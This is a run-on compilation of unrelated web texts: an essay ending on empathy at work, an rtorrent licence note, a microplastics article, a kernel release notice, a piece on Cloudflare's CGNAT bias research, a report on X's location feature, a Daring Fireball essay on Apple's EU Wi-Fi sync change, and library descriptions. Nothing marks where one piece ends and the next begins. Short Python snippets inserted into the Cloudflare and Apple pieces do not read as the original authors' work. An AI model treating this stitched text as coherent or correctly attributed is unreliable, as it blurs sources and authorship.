how many lines of code we wrote
, or how fast we wrote them.
When people want to work with us—or even look forward to it—that means we have trust and respect. We’ll be on proper footing for working effectively as a group to solve problems. For developers this looks like coaching a junior developer, hopping on a quick call to pair with somebody, or understanding the business value of the next backlog item. For leaders this looks like people who feel empowered to do their work, who can proactively identify issues, or who can rally and adapt when circumstances change.
Anybody can do this! I can’t think of any other career advice that’s as universal as empathy and humility. Everybody is capable of, at any point in their lives, small yet impactful improvements.
So remember—watch your ego and look for opportunities to leverage empathy and humility in the pursuit of information so that you can solve problems together.
In
my next essay on this subject
I’ll get into the practical. What I like about this advice is that, while there’s much we can do, we don’t have to do it all to see some benefit. We can pick and choose and try something out. We can take our time and grow. Nobody’s perfect, not even Ted Lasso. Even if we take after a character like
Roy Kent
we can still call that a win. Just watch the show, OK?
An open-source photo editor & digital compositor for the web
GNU GPL, see COPYING. "libtorrent/src/utils/sha_fast.{cc,h}" is
originally from the Mozilla NSS and is under a triple license: MPL, LGPL and GPL. An exception for non-NSS code has been added to allow linking to OpenSSL, as requested by Debian, though the author considers that library to be part of the operating system and thus linking is allowed under the GPL.
Use whatever fits your purpose; the code required to compile with Mozilla's NSS implementation of SHA1 has been retained and can be compiled if the user wishes to avoid using OpenSSL.
DEPENDENCIES
libcurl >= 7.12.0
libtorrent = (same version)
ncurses
BUILD DEPENDENCIES
libtoolize
aclocal
autoconf
autoheader
automake
'Invisible' microplastics spread in skies as global pollutant
Minuscule airborne plastic particles are spreading to all corners of the planet, penetrating deep into human bodies and sparking alarm among researchers in this relatively new field of study.
Studies are shedding light on the origins, transport mechanisms and impact of these pollutant microplastics, which are too small to be seen with the naked eye.
They have been found in skies above Mount Fuji, in European rain, Arctic snow and within human bodies. These byproducts of human activity could also be fueling extreme weather conditions.
“Marine microplastic pollution has drawn so much attention that the ocean has been assumed to be the final destination for microplastics, but recent studies indicate that airborne plastic pollution is spreading at an alarming rate,” said Hiroshi Okochi, a Waseda University professor of environmental chemistry.
Okochi leads a research team that has been studying airborne microplastics since 2017 and was the first to show that the pollutants had made their way into cloud water.
According to studies conducted on how plastic waste is damaging marine creatures and the ocean environment, plastic litter that flows into seas degrades into “marine microplastics,” which measure 5 millimeters or less in particle size.
By contrast, few studies are available on “airborne microplastics,” most of which measure less than 2.5 micrometers (0.0025 millimeter) across.
One study published in 2016 found plastics in fiber form in rainwater in Paris, showing that plastic particles were wafting in the air.
Okochi’s team in 2023 published a study that showed water in clouds covering the top of Mount Fuji contained 6.7 pieces of microplastics per liter.
Airborne microplastics travel in different manners at different altitudes.
In the free troposphere, an atmospheric layer extending above an altitude of 2,000 to 2,500 meters, substances are transported intercontinentally over long distances by prevailing westerly winds and other air currents. They are rarely affected by things on the ground.
The microplastic particles found above 3,776-meter-tall Mount Fuji, where clouds can form, were carried far from their sources, Okochi’s team said.
POSSIBLE CAUSE OF TORRENTIAL DOWNPOURS
According to one theory, when a large-scale atmospheric depression forms and generates ascending air currents, ground-based and seaborne microplastics are swirled up by the wind and sea spray and carried high up into the skies.
Once in the free troposphere, strong winds push the microplastics to higher levels and at enormous speeds, polluting the layer.
A team of scientists from Germany and Switzerland reported that they had found more than 10,000 pieces of microplastics per liter of snow in the Arctic. They said such microplastics are likely traveling over long distances in the air and being deposited with snow.
Microplastics may even be inducing cloud formation.
Clouds naturally form when dust serves as nuclei for water vapor to condense on. Typical ingredients of plastic products, such as polyethylene and polypropylene, naturally repel water.
Microplastics, however, change in chemical structure and obtain hydrophilicity, or affinity for water, when they are degraded by ultraviolet rays.
That likely facilitates cloud formation through vapor condensation, Okochi said.
Some experts say microplastics could be causing sudden torrential downpours and other extreme weather phenomena.
Studies have also found that microplastics, when degraded by ultraviolet rays, emit greenhouse gases, such as methane and carbon dioxide.
PLASTICS ENTERING LUNGS
Although plastics have been found in various regions of the human body, it is not yet known what impact the airborne substances have on health.
Airborne microplastic particles measuring 1 micrometer (0.001 millimeter) or less in size are believed capable of reaching the alveoli of the lung.
A study conducted in Britain said microplastics were detected in 11 of 13 lung tissue samples from patients who underwent lung surgeries. The highest levels were found in the lowermost region of the lung.
A human breathes more than 20,000 times a day, which adds up to 600 million to 700 million times throughout a lifetime.
There is no standard method for measuring airborne microplastics, so estimated amounts being inhaled by humans vary wildly from one research article to another.
Okochi said he hopes to develop a unified method for measuring the shapes, types, sizes and concentrations of airborne plastics so researchers across the globe can use it in their observations.
“We inevitably end up inhaling airborne microplastics without knowing it because the pollution they are causing is invisible,” Okochi said. “So little is clearly known about their possible impact on health and the environment, which is only beginning to be discussed. There should be more fact-finding studies on the matter.”
HOPES ON FOREST ADSORPTION
Airborne microplastics come from various sources, including road dust, tire abrasions, artificial turf and clothing.
Effective measures to reduce exposure include avoiding the use of synthetic fiber clothes and washing clothes in mesh laundry bags to prevent the garments from rubbing together.
In the larger picture, society could reflect on whether certain plastic products in close surroundings are really necessary or could be replaced with non-plastic materials.
For airborne plastics that are too small to be visible, absorption by forests is drawing attention as a hopeful measure.
A group of researchers, including Okochi and scientists from Japan Women’s University, found that “konara” oak leaves adsorb airborne plastics through “epicuticular wax,” a coating layer on the leaf surface that protects the tissue from ultraviolet rays and external threats.
Konara forests in Japan can absorb an estimated 420 trillion pieces of airborne microplastics a year, Okochi said.
His team is now studying the use of fast-growing paulownia trees to fight the airborne microplastics.
There are hopes this tree variety can address other environmental problems. The trees absorb large volumes of carbon dioxide and can be used to absorb radioactive substances in the soil in Fukushima Prefecture, the site of the 2011 nuclear disaster.
“Planting the trees on the roadside could help reduce inhalation by humans,” Okochi said. “We hope to pursue the potential of this new emissions reduction measure using fast-growing paulownia trees to lower the risk of human exposure.”
Kernel prepatch 6.18-rc7
Linux Weekly News
lwn.net
2025-11-24 00:10:02
Linus has released 6.18-rc7, probably the last -rc before the 6.18 release.
So the rc6 kernel wasn't great: we had a last-minute core VM
regression that caused people problems.
That's not a great thing late in the release cycle like that, but
it was a fairly trivial fix, and the cause wasn't some horrid bug,
just a latent gotcha that happened to then bite a late VM fix. So
while not great, it also doesn't make me worry about the state of
6.18. We're still on track for a final release next weekend unless
some big new problem rears its ugly head.
Before the potential of the internet was appreciated around the world, nations that understood its importance managed to scoop outsized allocations of IPv4 addresses, actions that today mean many users in the rest of the world are more likely to find their connections throttled or blocked.
So says Cloudflare, which last week published
research
that recalls how once the world started to run out of IPv4 addresses, engineers devised network address translation (NAT) so that multiple devices can share a single IPv4 address. NAT can handle tens of thousands of devices, but carriers typically operate many more. Internetworking wonks therefore developed Carrier-Grade NAT (CGNAT), which can handle over 100 devices per IPv4 address and scale to serve millions of users.
That’s useful for carriers everywhere, but especially valuable for carriers in those countries that missed out on big allocations of IPv4 because their small pool of available number resources means they must employ CGNAT to handle more users and devices. Cloudflare's research suggests carriers in Africa and Asia use CGNAT more than those on other continents.
Cloudflare worried that could be bad for individual netizens.
“CGNATs also create significant operational fallout stemming from the fact that hundreds or even thousands of clients can appear to originate from a single IP address,” wrote Cloudflare researchers Vasilis Giotsas and Marwan Fayed. “This means an IP-based security system may inadvertently block or throttle large groups of users as a result of a single user behind the CGNAT engaging in malicious activity.”
“Blocking the shared IP therefore penalizes many innocent users along with the abuser.”
The researchers also noted “traditional abuse-mitigation techniques, such as blocklisting or rate-limiting, assume a one-to-one relationship between IP addresses and users: when malicious activity is detected, the offending IP address can be blocked to prevent further abuse.”
Because CGNAT is more prominent, and more heavily used, in Africa and Asia, they suggested “CGNAT is a likely unseen source of bias on the Internet.”
“Those biases would be more pronounced wherever there are more users and few addresses, such as in developing regions. And these biases can have profound implications for user experience, network operations, and digital equity,” the researchers wrote.
To test that hypothesis, the pair went looking for CGNAT implementations using traceroute, WHOIS and reverse DNS pointer (PTR) records, and existing lists of VPN and proxy IP addresses. That effort yielded a labeled dataset of more than 200K CGNAT IPs, 180K VPN and proxy IPs, and close to 900K other IPs relevant to the study of CGNAT. They used that dataset, and Cloudflare’s analysis of bot activity, to analyze whether CGNAT traffic is rate-limited with the same frequency as traffic from un-abstracted IP addresses.
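This is not Cloudflare's classifier, but one simple signal the traceroute approach can exploit is RFC 6598's shared address space (100.64.0.0/10), which carriers commonly deploy on the subscriber side of the CGNAT. A minimal sketch:

```python
# Minimal sketch of one CGNAT signal: RFC 6598 reserves 100.64.0.0/10 for the
# "inside" of carrier-grade NAT, so seeing it on a path toward a client is a
# strong hint the client sits behind CGNAT. Illustration only, not
# Cloudflare's actual methodology.
from ipaddress import ip_address, ip_network

SHARED_ADDRESS_SPACE = ip_network("100.64.0.0/10")   # RFC 6598

def looks_like_cgnat_hop(addr: str) -> bool:
    return ip_address(addr) in SHARED_ADDRESS_SPACE

# e.g. hop addresses gathered from a traceroute toward a client's public IP
hops = ["192.168.1.1", "100.64.12.7", "203.0.113.9"]
print(any(looks_like_cgnat_hop(h) for h in hops))    # True
```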
That effort found indicators of bias: non-CGNAT IPs are more likely to be bots than CGNAT IPs, yet traffic from CGNAT IPs is more likely to be rate-limited.
“Despite bot scores that indicate traffic is more likely to be from human users, CGNAT IPs are subject to rate limiting three times more often than non-CGNAT IPs,” the pair wrote. “This is likely because multiple users share the same public IP, increasing the chances that legitimate traffic gets caught by customers’ bot mitigation and firewall rules.”
The authors therefore conclude: “Accurate detection of CGNAT IPs is crucial for minimizing collateral effects in network operations and for ensuring fair and effective application of security measures.”
They suggest ISPs that run CGNAT get in touch to help the community better understand the challenges of using the tech without introducing bias.
The authors also acknowledge that all these problems would go away if the world just moved to IPv6, and that CGNAT was supposed to tide network operators over until that happened. They also note the old proverb – “Nothing is more permanent than a temporary solution” – as the likely reason CGNAT remains relevant today. ®
X's new country-of-origin feature reveals many 'US' accounts to be foreign-run
Elon Musk's X, formerly Twitter, has rolled out a feature where going to the ‘Joined’ tab on one's profile displays the country of origin for that account.
Elon Musk's X, formerly Twitter, has introduced the country-of-origin feature that seems to have thrown both the MAGA and Democrats' online worlds into chaos. Several profiles that had pushed certain narratives are now being found to have been operating from outside the US.
The social media platform introduced a feature where one can see the country the account is based in. One has to head to an account and click on the date joined tab, which opens up onto a new page. This shows the country where that particular account is being operated from. While the feature was briefly removed after its introduction, it has now been added again, and both sides of the political spectrum are having a field day, calling out each other online.
What to know about ‘American’ accounts based outside the US
The accounts being discussed here have pushed agendas within the US, and commented on US politics regularly. Many are also named to echo political movements, like some MAGA accounts.
However, these ‘political influencers’ have been found to be based outside the US, raising questions about the motives.
One profile going by 'MAGA NATION' with a follower count of over 392,000, is based out of eastern Europe. Similarly, ‘Dark Maga’ a page with over 15,000 followers is based out of Thailand. ‘MAGA Scope’ which boasts over 51,000 followers is actually operated out of Nigeria, and ‘America First’, an account with over 67,000 followers is based out of Bangladesh.
“At this time thousands of MAGA-aligned influencer accounts and large political pages that claim to be based in the U.S. are now being investigated and exposed with many of them traced to India, Nigeria, and other countries,” a news aggregator page on X noted.
It wasn't just on the MAGA side. An account going by ‘Ron Smith’ whose bio claims he's a ‘Proud Democrat’ and ‘Professional MAGA hunter’ is operated out of
Kenya
. The account has over 52,000 followers.
‘Republicans against Trump’, an anti-Donald Trump page on X which pushes back against MAGA politics, was reportedly operating out of Austria. While the location now shows US, X notes that the account location might not be accurate due to use of a VPN. “The Anti-Trump account “Republicans Against Trump” which 1M followed has been identified as a non-American from Austria and is currently using a VPN to hide their location,” a page said, making note of this.
‘Republicans against Trump’ has over 978,000 followers.
On a side note, an account going by ‘Mariana Times’, with over 78,000 followers, which posts pro-Israel content has been found to be based out of India.
People within the MAGA orbit have also reacted to this new feature. Congresswoman Anna Paulina Luna wrote on X from her personal account, “All of these pretend “pro-America” accounts that were pushing infighting within Maga are literally foreign grifters. I’m telling you, the foreign opp is real and so are the bot accounts.”
Alexis Wilkins, FBI director Kash Patel's girlfriend, also added, “I hope that everyone sees, regardless of their specific reason, that the enemy is outside of the house. The people posing as Americans with big American opinions but are actually operating from a basement across the world have one common goal - to destroy the United States. We have our issues, but we really can’t allow them to succeed.”
★ Exploring, in Detail, Apple’s Compliance With the EU’s DMA Mandate Regarding Apple Watch, Third-Party Accessories, and the Syncing of Saved Wi-Fi Networks From iPhones to Which They’re Paired
Daring Fireball
daringfireball.net
2025-11-23 23:00:00
The bottom line is that users setting up new Apple Watches in the EU will now get a slightly worse experience in the name of parity with accessories made by third-party companies. It remains to be seen whether users of third-party iPhone accessories and peripherals in the EU will see any benefit.
But now comes word of the first feature that Apple is limiting or removing in an existing product to comply with the DMA: Wi-Fi network sync between iPhone and Apple Watch, which is poised to change in the EU next month, with the 26.2 releases of iOS and WatchOS. The news was broken by Nicolas Lellouche,
reporting for the French-language site Numerama
. I’m quoting here from Safari’s English translation of his original report:
Apple has been warning for several months that it could one day,
if it deems it necessary, disable functions in the European Union
to “protect its users”. This day could arrive in December, with
the iOS 26.2 update.
On November 4, Apple announced to Numerama that it had made the
decision to disable Wi-Fi synchronization between an iPhone and an
Apple Watch in Europe so as not to have to comply with the
European Commission’s request, which wants to force it by the end
of 2025 to open the iPhone’s Wi-Fi to third-party accessories.
This announcement follows the opening of the AirPods Live
Translation function in Europe, with a new API to allow
competitors to use the microphones and speakers of AirPods and
iPhone simultaneously. [...]
Apple indicates that the European Commission is asking it to
replicate the link between an iPhone and an Apple Watch, but with
third-party products. Apple, after thinking long about how to
implement this function, finally decided to reject the European
request. Since Europe requires that third-party products be
treated like the Apple Watch, then Apple disables the function on
Apple Watch. This allows it to comply with the DMA.
Lellouche’s report at Numerama broke this story (the reports at
MacRumors
and
9to5Mac
are both based on Numerama’s), but the above is not an accurate summary of what Apple is doing with iOS 26.2.
1
Apple
is
complying with the DMA, and they’re
not
disabling Wi-Fi network synchronization between an iPhone and a paired Apple Watch. What Apple is doing, in order to comply with the DMA, is changing how Wi-Fi networks sync with Apple Watch (in the EU), and offering new APIs in the EU for third-party paired devices to put them on equal (or near-equal?) footing with Apple Watch (in the EU).
This change should be relatively limited. Honestly, I don’t think many Apple Watch users in the EU will even notice. But it is at least mildly annoying, and the relatively minor, very specific nature of this particular DMA mandate makes it a telling example of the European Commission’s overreach.
Currently, when you pair a new Apple Watch with an iPhone, iOS transfers to WatchOS the iPhone’s entire list of saved Wi-Fi networks and their passwords — directly, device-to-device. As iOS learns of new networks that the user joins from their iPhone, that information continues to be shared with any Apple Watches paired to that iPhone. The utility of this is that if you’re wearing your Apple Watch, but don’t have your iPhone nearby, your watch will join an available saved Wi-Fi network at your location. Let’s say you go for a run or walk, with only your Apple Watch, and you stop at a cafe for a beverage. If you’ve ever joined the Wi-Fi network at that cafe from your iPhone, your Apple Watch will join that network automatically. It should, and in my personal experience does, just work.
The EU mandate to Apple is
not
that Apple must grant to third-party devices and their iOS companion applications this same functionality as it stands today — that is to say, access to the entire history of the iPhone’s known Wi-Fi networks. The EU mandate is that Apple must grant to third-party devices the same level of access to Wi-Fi network information that Apple Watch has. Apple is complying with this mandate in two ways: (a) by changing how much Wi-Fi network information an Apple Watch gets from the iPhone to which it is paired; and (b) creating a new framework in iOS 26.2 (gated by a new entitlement),
Wi-Fi Infrastructure
, that provides a set of public APIs, available only to apps in the EU, to (per the framework’s description) “share Wi-Fi network credentials securely between devices and connected accessories.”
The change for Apple Watch in the EU is that starting with iOS 26.2, when a new (or reset) Apple Watch is set up, the Apple Watch will no longer have the user’s list of saved Wi-Fi networks automatically synced from their iPhone. Only future networks will be synced — the same level of access that the new Wi-Fi Infrastructure framework is making available to third-party accessories.
Under the new rules for Apple Watch in the EU, an existing (that is to say, already configured) watch that is upgraded to WatchOS 26.2 will still remember all Wi-Fi networks it already knew about. But a new Apple Watch will only be able to automatically connect to Wi-Fi networks that its associated iPhone saves
after
the Apple Watch was set up and paired. So when an EU Apple Watch owner with a new watch visits a known location, and doesn’t have their iPhone with them, the watch won’t be able to join that location’s Wi-Fi automatically, unless the paired iPhone has connected to and saved that network
after
the watch was paired.
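To make the behavioral difference concrete, here is a toy model of the two sync policies as described above. It reflects none of Apple's actual code or APIs, only the observable outcome:

```python
# Toy model of the two policies described above. Nothing here reflects
# Apple's implementation or APIs; it only illustrates the observable difference.
from dataclasses import dataclass, field

@dataclass
class Watch:
    forward_only: bool                  # True models the EU behavior in 26.2
    known_networks: set = field(default_factory=set)

def pair(watch: Watch, iphone_saved_networks: set):
    if not watch.forward_only:
        # Pre-26.2 / non-EU: the full history of saved networks syncs at setup.
        watch.known_networks |= set(iphone_saved_networks)

def iphone_joins(watch: Watch, ssid: str):
    # Networks the iPhone joins *after* pairing sync in both cases.
    watch.known_networks.add(ssid)

history = {"Home", "Cafe Corner", "Airport"}
eu_watch, us_watch = Watch(forward_only=True), Watch(forward_only=False)
pair(eu_watch, history); pair(us_watch, history)
iphone_joins(eu_watch, "New Gym"); iphone_joins(us_watch, "New Gym")

print(us_watch.known_networks)   # {'Home', 'Cafe Corner', 'Airport', 'New Gym'}
print(eu_watch.known_networks)   # {'New Gym'} -- old haunts won't auto-join
```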
With iOS 26.2, the behavior for users outside the EU will remain unchanged from iOS 26.1 and prior — both for Apple Watch and for third-party accessories.
A user’s Wi-Fi history can be used to glean significant information about them. Who they know (other homes’ networks), where they’ve been (medical providers, restaurants, airports), and more. Apple’s new policy for Apple Watch and third-party devices mitigates the sharing of historical networks, but with the sharing of future networks as the associated iPhone joins them, there’s still a risk here of third-party companies doing things with the user’s Wi-Fi network information that the user doesn’t understand, or doesn’t realize they’ve consented to.
One way to look at Apple’s options for complying with this particular DMA mandate is by considering the extremes. On the one extreme, Apple could have just granted third-party peripherals in the EU the exact same access to users’ iPhone Wi-Fi network history that Apple Watch has gotten until now (and will continue to get outside the EU). On the other extreme, Apple could have cut off Wi-Fi network syncing to the Apple Watch altogether, requiring users to connect to each Wi-Fi network manually, using the Watch itself or the Apple Watch app on iPhone. Instead, Apple chose a middle ground — limiting Wi-Fi network history sync to the Apple Watch in the EU in ways that it isn’t limited anywhere else in the world, but granting third-party accessories in the EU access to these new Wi-Fi Infrastructure APIs that aren’t available outside the EU.
Critics might argue that while this middle ground is technically compliant with the DMA, it’s not compliant with the
intention
of the DMA, which would be for the Apple Watch not to lose any functionality in the EU, and for Apple to provide APIs to allow third-party devices all of the Wi-Fi syncing features currently available to Apple Watch. Apple would argue, and I agree, that the European Commission’s intentions are incoherent in this regard. The EC insists that Apple should protect users’ privacy and security, while also insisting that Apple grant access to third-party apps and devices that can potentially compromise users’ privacy and security.
There’s a reason why Apple isn’t offering the new Wi-Fi Infrastructure framework outside the EU, and that’s because they don’t believe it’s a good idea to grant any access at all to your saved Wi-Fi networks to third-party apps and devices. Especially without being able to specify a policy that Wi-Fi network information should be treated the way Apple treats it — remaining exclusively on device.
The skeptical take on Apple’s motivations in this situation is that Apple is spitefully removing functionality from Apple Watch rather than offering new APIs to provide third-party devices with the same functionality that Apple Watch currently has, and that Apple’s intention here is, somehow, primarily about trying to drive anti-DMA sentiment amongst its EU users. This is, in fact, the skeptical take on every single aspect of Apple’s compliance with the DMA: spiteful “malicious compliance” that, somehow, is intended to engender grassroots opposition to the DMA amongst Apple customers in the EU. I don’t think that’s an accurate take overall, but in this particular case with Apple Watch and Wi-Fi network sync, it’s almost silly.
Part of what makes this particular situation clarifying is that it’s so specific. It’s not about allowing third-party devices and their corresponding iOS apps to do
everything
that Apple Watches, and the Apple Watch iOS companion app, can do. It’s very specifically about the sharing of known Wi-Fi networks. (There will, surely, be other such situations to come regarding other features, for other Apple devices.) And as I described above, very few Apple Watch owners in the EU are likely to notice the change. How many Apple Watch users today realize that their watch automatically connects to known Wi-Fi networks when their iPhone is outside Bluetooth range?
If Apple were motivated by spite, and were trying to turn EU Apple Watch owners against the DMA, they’d just remove all Wi-Fi network syncing between the watch and its paired iPhone. Not just the historical list of all networks the iPhone has ever connected to, but the continuous sync of new networks the iPhone joins after the Apple Watch is paired.
That
would be a change Apple Watch users would be more likely to notice. But it’s not what Apple is doing. They’ve engineered an entire framework of public APIs to comply with the EC’s mandate.
But the reporting to date on this situation, starting with Numerama, paints the picture that Apple
is
dropping all Wi-Fi sync between WatchOS and iOS in the EU, and that Apple is refusing to make Wi-Fi network information available to third-party accessories.
Here’s Michael Tsai
, after quoting from Tim Hardwick’s summary at MacRumors of Numerama’s report:
It seems perfectly reasonable that if I have a third-party watch I
should be able to opt into having my phone share Wi-Fi info with
it. You can debate whether mandating this is the proper role of
government, but the status quo is clearly anti-competitive and bad
for the user experience. I’m open to hearing a story where Apple’s
position makes sense, but so far it just seems like FUD to me.
What is the argument, exactly? That Fitbit, which already has its
own GPS, is going to sell your access point–based location
history? That Facebook is going to trick you into granting access
to their app even though they have no corresponding device?
Tsai is making a few wrong assumptions here. First, Apple
is
enabling users (in the EU) to opt into having their iPhone share Wi-Fi information with third-party devices. Second, this mandate is not specific to smartwatches — it applies to any devices that can pair with an iPhone and have corresponding iOS partner apps. So Meta, with their lineup of smartglasses,
does
have corresponding devices. And,
per Apple’s public statements
, it is Meta in particular that has been zealously pursuing interoperability mandates pursuant to the DMA. I think it’s entirely possible that this entire issue regarding Wi-Fi network sharing was prompted by Meta’s interoperability requests to the European Commission.
2
As for the argument regarding why Apple has chosen to comply in this way, what is essential to note is that
none
of this Wi-Fi network information shared between iOS and WatchOS
is ever sent to or seen by Apple
. Apple doesn’t see the network passwords, doesn’t see the names of the networks, and doesn’t even know when a device has joined a new network. All of this is exclusively on-device, and when the information is exchanged between an iPhone and paired Apple Watch, it’s transferred device-to-device. (This is also true when you use Apple’s features to share Wi-Fi passwords with nearby friends. It’s device-to-device and entirely private and secure. Apple doesn’t even know that person A sent a Wi-Fi password to person B, let alone know the name of the network or the password.)
As someone who relies a lot on the Watch (especially now that
WhatsApp works locally on it), I’d say we have officially reached
the point where Apple is on the verge of actively harming their
user experience for no good reason whatsoever. I honestly don’t
know if this is bull-headedness or malicious compliance.
On the other hand, someone at the EU clearly prefers being in the
limelight by regulating against evil US corporations in ways that
affect very small parts of the general population rather than,
say, go after Asian smart TV manufacturers that are present in
millions of homes and resell data on Europeans’ TV viewing habits.
No notes on Carmo’s second point. But regarding the first, his opinion is founded on incorrect assumptions. Apple clearly thinks it’s a bad idea to share any Wi-Fi information at all with third-party devices, but they’ve created an entire new framework for use within the EU to allow it, just so they can continue syncing any Wi-Fi network information at all with Apple Watch. Far from harming the user experience, Apple is bending over backwards to make the Apple Watch experience as good as possible while balancing the privacy and security implications of this DMA mandate. Rather than take away all Wi-Fi network syncing, Apple is leaving most of it in place, and only eliminating (in the EU) the part at the very beginning, where, during the setup process, all of the current networks saved on the iPhone are synced to the Apple Watch.
Given the mandate regarding the DMA, and given the privacy implications of sharing any of this information with third-party developers and peripheral makers, I personally think it would have been reasonable for Apple to take the extreme position of simply disallowing Wi-Fi network information syncing to any and all devices, including Apple Watches, in the EU. But Apple isn’t doing that, and they’ve undertaken a significant software engineering effort — just for the EU — to support the path they’ve chosen. Carmo’s critique seems predicated on the assumption that Apple is just cutting off all Wi-Fi network sharing.
Given that Apple’s compliance needs to account for potentially untrustworthy device makers — whether by
intent
, or
incompetence
— not syncing all known networks seems like a reasonable trade-off.
Why simply not ask the user whether or not to share WiFi history
identically whether connecting to an Apple product or a Meta
product?
That is, in fact, what Apple is doing. But the privacy implications for a user are different when an iPhone’s saved Wi-Fi networks are shared with, say, a Meta product than with another Apple product. It’s worth emphasizing that the European Commission’s mandate does not permit Apple to require those third-party companies to treat this information with the same privacy protections that Apple does. Apple keeps that information exclusively on-device, but Apple is not permitted to require third-party peripheral makers to do the same.
Consider
the iOS system prompt for App Tracking Transparency
: the user’s two choices are “Ask App Not to Track” and “Allow”. It’s a common and natural question why the first option is “Ask App Not to Track” rather than “Don’t Allow”. It would certainly look better if the options were “Don’t Allow” and “Allow”. But Apple deliberately made the first button “Ask App Not to Track” because ATT is, at least partially, a
policy
, not a complete technical guarantee. If an app prompts for ATT permission and the user chooses “Ask App Not to Track”, that app should definitely
not
go ahead and attempt to track the user’s activity across other apps. But, technically, it could try.
3
I presume, if they do, that Apple will rap the developer’s knuckles in the App Store review process, or even suspend the app’s developer account.
4
Under the EU’s mandate to Apple regarding Wi-Fi network access for third-party devices and their corresponding iOS apps, Apple is not permitted even to set a policy that these apps must pinky swear to keep the information private and on-device. Nor is the EU itself demanding it. If a third-party device-maker wants to send your iPhone’s Wi-Fi network history to their servers and save it, that’s up to them,
not
Apple, per the EC. Apple sees that as a problem.
5
You can argue — and some will, as I think Michael Tsai does in the passage I quote above, and as Tim Sweeney clearly does — that this ought to be up to the user. If a user says they’re fine with their Wi-Fi network information being shared with a third-party accessory they’ve paired with their iPhone, that’s up to them. That is a reasonable take. But I think Apple’s perspective is reasonable as well — that they should be able to make products where this isn’t possible.
The “it should be up to the user” take benefits informed, technically savvy users. The “it shouldn’t be possible” take benefits uninformed, un-savvy users — users who in many cases have decided that they simply trust Apple. The iPhone brand message — the brand message behind the Apple ecosystem — is that Apple doesn’t allow things that are dangerous to security or privacy. I do not think most iPhone users expect a third-party device they pair to their iPhone to be able to send their entire history of Wi-Fi networks back to the company that made the device. (Most iPhone users also don’t realize how sensitive, privacy-wise, their complete Wi-Fi network history is.)
It’s fair to point out that the “it should be up to the user” take is more beneficial to third-party accessory makers than the “it shouldn’t be possible” take. And that this conflict of interest — where the same limitations that protect iPhone users’ privacy by definition put third-party devices at a disadvantage that Apple’s own iPhone-connected devices don’t face — works not just in iPhone users’ favor, privacy-wise, but also in Apple’s favor, financially. Apple can sell more Apple Watches if they work better with iPhones than smartwatches from other companies do. That’s obviously true, but that’s just another way of saying that first-party products have inherent advantages that third-party products don’t, to which I say:
Duh
. Apple’s own peripherals, like Apple Watch, can do things that third-party peripherals can’t because Apple can trust its own devices, and its own software, in ways that it can’t trust devices and companion apps made by other companies.
It’s natural for a company to bootstrap a new product on the back of an existing successful one. Meta’s Threads social network, for example, uses the same usernames and sign-in system as Instagram, which is arguably the most successful social network in the world. Should Meta not have been permitted to do that? Or should they be forced to allow
anyone
to create new competing social networks using Instagram user accounts as the ID system?
It’d be pretty weird if Apple limited itself, when designing and engineering features that integrate experiences across
its own
devices, to what it would allow third-party developers to do. It’d be even weirder if Apple allowed third-party developers to do everything Apple’s own software can do.
6
For at least the last
15 years
, I’ve
repeatedly
emphasized that Apple’s priorities
are in this order
: Apple first, users second, developers third. The DMA attempts to invert that order, privileging developers first (in the ostensible name of fair competition with Apple, a designated “gatekeeper”), ahead of users, and ahead of Apple itself. So of course Apple is going to object to and resist mandates that require it to subordinate its own strategic desires — its own sense of how its products ought to be designed and engineered — especially when the primary beneficiaries of the mandates aren’t users, but developers. Many of whom, especially the larger ones, are Apple’s competitors. But I also think it’s clear, with Apple in particular, that users prefer Apple’s priorities. People are happier with Apple putting users’ considerations ahead of developers’ than they are when developers are free to run roughshod over the software platform.
The clearest example of that is the App Store. It’s developers, not users, who object to the App Store model — the exclusivity of distribution, the exclusivity of the vendor’s payment system, the vendor’s payment commissions, the vendor’s functional guidelines and restrictions, all of it. Users don’t have a problem with any of that. That’s why Apple
commissioned and then publicized a study
, just this month, that showed that DMA-driven changes saved developers €20 million in commissions, but that reduction in commissions didn’t lower the prices users pay. Developer-focused observers
see that as a win for the DMA
— that’s €20 million in developers’ pockets that otherwise would have gone into Apple’s already overflowing pockets. But a user-focused observer might see that as clarifying evidence that the DMA wasn’t designed to benefit users, and isn’t benefiting users in practice either. Apple doesn’t care about €20 million. They fart bigger than that. They do care about clarifying who the DMA prioritizes first, and that it’s not users. (And, of course, that it’s not Apple itself.)
Users love the App Store model. With Apple in particular, users, by and large,
like
the idea that the platforms have stringent guardrails. Many buy iPhones
because
Apple exerts such control over the platform, not
despite
it. But that control is exactly why Apple has been so singularly targeted by the European Commission regarding DMA mandates, despite the fact that Samsung by itself — let alone the Android platform as a whole —
sells more phones in Europe
(and
the world
) than Apple does.
The bottom line is that users setting up new Apple Watches in the EU will now get a slightly worse experience in the name of parity with accessories made by third-party companies. It remains to be seen whether users of third-party iPhone accessories and peripherals in the EU will see any benefit at all (because the companies that make their devices will need to adopt these new EU-exclusive Wi-Fi Infrastructure APIs in their iOS companion apps) — and, if the users of third-party iPhone accessories
do
see the benefit of Wi-Fi network information syncing to their devices, whether their privacy will be respected. But don’t make the mistake of thinking that Apple is complying the least bit spitefully with regard to this mandate.
libfive: a software library and set of tools for solid modeling
libfive
is a software library and set of tools for solid modeling,
especially suited for parametric and procedural design.
It is infrastructure for generative design,
mass customization,
and domain-specific CAD tools.
The geometry kernel is based on functional representations,
which have several benefits over traditional triangle meshes:
Constructive solid geometry is trivial, and scales well to large models
Resolution can be arbitrarily high (down to floating-point accuracy)
Many unusual operations (e.g. blends and warps) are robust and easy to express
The
libfive
stack includes a low-level geometry kernel,
bindings in higher-level languages, a standard library of
shapes and transforms, and a desktop application
for script-based design.
Studio is a great place to start, but it's only one example of an application
that can be built on this framework.
The layers are loosely coupled, so you can build useful tools at various
levels of abstraction.
Building your own CAD software?
Use the
libfive
kernel for solid modeling,
then add domain-specific details with your own GUI and frontend.
Need bindings in a high-level language?
Use the C bindings and your language's FFI
to build tools that integrate with the rest of your system.
How about a design customizer?
Write a headless CAD application with the Scheme bindings
and standard library, then run it as a service
to generate user-customized models.
libfive
is an open-source project licensed under the MPL
(for kernel and core libraries) and GPL (for the Studio GUI).
This means that it's a commercially friendly kernel;
indeed, it's already used in at least one commercial CAD package.
This repo contains the protocol specification, reference implementations, and tests for the negentropy set-reconciliation protocol. See
our article
for a detailed description. For the low-level wire protocol, see the
Negentropy Protocol V1
specification.
Set-reconciliation supports the replication or syncing of data-sets, either because they were created independently, or because they have drifted out of sync due to downtime, network partitions, misconfigurations, etc. In the latter case, detecting and fixing these inconsistencies is sometimes called
anti-entropy repair
.
